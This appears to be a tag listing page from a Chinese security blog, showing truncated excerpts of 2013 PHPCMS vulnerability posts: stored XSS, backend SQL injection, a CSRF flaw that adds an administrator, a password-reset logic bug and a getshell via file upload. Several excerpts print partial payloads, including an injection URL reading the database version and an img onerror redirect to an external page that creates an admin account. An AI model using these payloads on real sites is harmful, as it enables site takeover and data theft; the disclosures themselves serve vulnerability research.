标签 phpcms 下的文章

PHPCMS guestbook module Stored XSS Vulnerability

CVE-2013-5939:PHPCMS guestbook module Stored XSS VulnerabilitySeverity: ImportantVendor: phpcms.cnVersions Affected: All of use guestbook module phpcmsDescription: The phpcms has be found the Store...

没穿底裤 2013 年 10 月 23 日 暂无评论

phpcms两处后台的SQL注入

(一):http://www.0day5.com/phpcmsv9/index.php?m=member&c=member&a=delete&pc_hash=GlyB7G&idpostuserid=(select * from (select * from(select name_const(@@version,0))a join (select name_c...

没穿底裤 2013 年 07 月 25 日 暂无评论

PHPCMS V9 文章投稿CSRF漏洞

CSRF导致可以添加后台管理员帐号。 在会员中心,文章投稿时,在来源填入: <img src="a" onerror="location.href='http://www.0day5.com/phpcms_v9_csrf_add_admin.php'">漏洞利用:<form name="myform" action="index.php?m=admin&c=admi...

没穿底裤 2013 年 04 月 15 日 2 条评论

PhpcmsV9 任意用户密码修改逻辑漏洞

其实我在发第一个漏洞的时候,就看到了 WooYun: PhpcmsV9 SQL注射 2013年贺岁第一发 提到的通行证的代码: parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);在phpsso_server/phpcms/modules/php...

没穿底裤 2013 年 03 月 05 日 暂无评论

PHPCMS v9 Getshell(Apache)

漏洞文件:phpcms\modules\attachment\attachments.php [php] public function crop_upload() { if (isset($GLOBALS["HTTP_RAW_POST_DATA"])) { $pic = $GLOBALS["HTTP_RAW_POST_DATA"]; if (isset($_GET['wi...

没穿底裤 2013 年 03 月 05 日 暂无评论

PHPCMS v9 SQL注入

2013 年 2 月 4 日 by lanu 文章题目:[漏洞分析]PHPCMS v9 SQL注入 作 者:L.N. && n3w1yb1r7h 时 间:2013-02-03 声 明:此漏洞非本人首发,在此只作代码分析。 漏洞分析: 漏洞文件:/phpcms/modules/member/index.php [php] public fun...

没穿底裤 2013 年 02 月 04 日 1 条评论